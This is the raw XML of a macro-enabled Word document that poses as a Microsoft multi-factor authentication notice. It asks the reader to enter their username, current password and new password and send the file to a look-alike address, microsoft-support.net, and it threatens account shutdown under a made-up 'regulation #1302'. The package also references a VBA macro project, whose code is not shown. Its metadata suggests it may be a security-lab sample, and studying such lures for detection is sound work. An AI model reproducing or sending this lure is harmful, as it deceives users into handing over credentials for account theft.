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vbaProject.bin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vbaProject.bin" ContentType="application/vnd.ms-office.vbaProject"/>
  <Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/>
  <Override PartName="/word/media/image1.png" ContentType="image/png"/>
  <Override PartName="/word/vbaData.xml" ContentType="application/vnd.ms-word.vbaData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0"/>
        <w:spacing w:before="240" w:after="480"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:kern w:val="2"/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2542540" cy="9613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40" w:after="480"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading0"/>
        <w:spacing w:before="240" w:after="480"/>
        <w:rPr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Microsoft Multi-factor Authentication 2FA Set up. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial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Your 2FA multi-factor settings requires </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>a password reset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial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. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">Fill the form below and send the document to: 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support@microsoft-support.net</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading0"/>
        <w:spacing w:before="240" w:after="480"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C9211E"/>
          <w:kern w:val="2"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Password reset:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="657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0"/>
        <w:gridCol w:w="3959"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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Username</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="39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Current Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="395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New Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="395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Retype New Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="395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spacing w:before="240" w:after="480"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:before="240" w:after="480"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Note: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Due to the new Microsoft© regulation #1302 all accounts without valid 2FA will be disabled 15 days after the date of receiving this notification.</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:type w:val="nextPage"/>
      <w:pgSz w:w="11339" w:h="18144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14c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700ed"/>
    <w:rPr>
      <w:color w:val="808080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240" w:after="4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14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ing0">
    <w:name w:val="Heading 0"/>
    <w:next w:val="TextBody"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:keepLines/>
      <w:widowControl/>
      <w:suppressAutoHyphens w:val="true"/>
      <w:bidi w:val="0"/>
      <w:spacing w:lineRule="auto" w:line="240" w:before="240" w:after="480"/>
      <w:jc w:val="start"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial Bold" w:hAnsi="Arial Bold" w:eastAsia="Times New Roman" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="394A58"/>
      <w:kern w:val="2"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TextBodyIndent">
    <w:name w:val="Body Text Indent"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:before="120" w:after="120"/>
      <w:ind w:start="720" w:hanging="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="StandardTag">
    <w:name w:val="Standard Tag"/>
    <w:next w:val="TextBody"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:widowControl/>
      <w:suppressAutoHyphens w:val="true"/>
      <w:bidi w:val="0"/>
      <w:spacing w:lineRule="auto" w:line="240" w:before="120" w:after="120"/>
      <w:jc w:val="start"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial Bold" w:hAnsi="Arial Bold" w:eastAsia="Times New Roman" w:cs="Arial"/>
      <w:b/>
      <w:color w:val="394A58"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA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microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/>
</Relationships>
</file>

<file path=word/_rels/vbaProject.bin.rels><?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.microsoft.com/office/2006/relationships/wordVbaData" Target="vbaData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LibreOffice/6.4.7.2$Linux_X86_64 LibreOffice_project/40$Build-2</Application>
  <Pages>1</Pages>
  <Words>59</Words>
  <Characters>352</Characters>
  <CharactersWithSpaces>404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2020-05-11T15:09:00Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <cp:keywords>password security reset</cp:keywords>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-15T20:08:07Z</dcterms:modified>
  <cp:revision>12</cp:revision>
  <dc:subject/>
  <dc:title>Password reset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Editor">
    <vt:lpwstr>Rad0g4st</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="Email">
    <vt:lpwstr>Rad0g4st@fortielab.com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</Properties>
</file>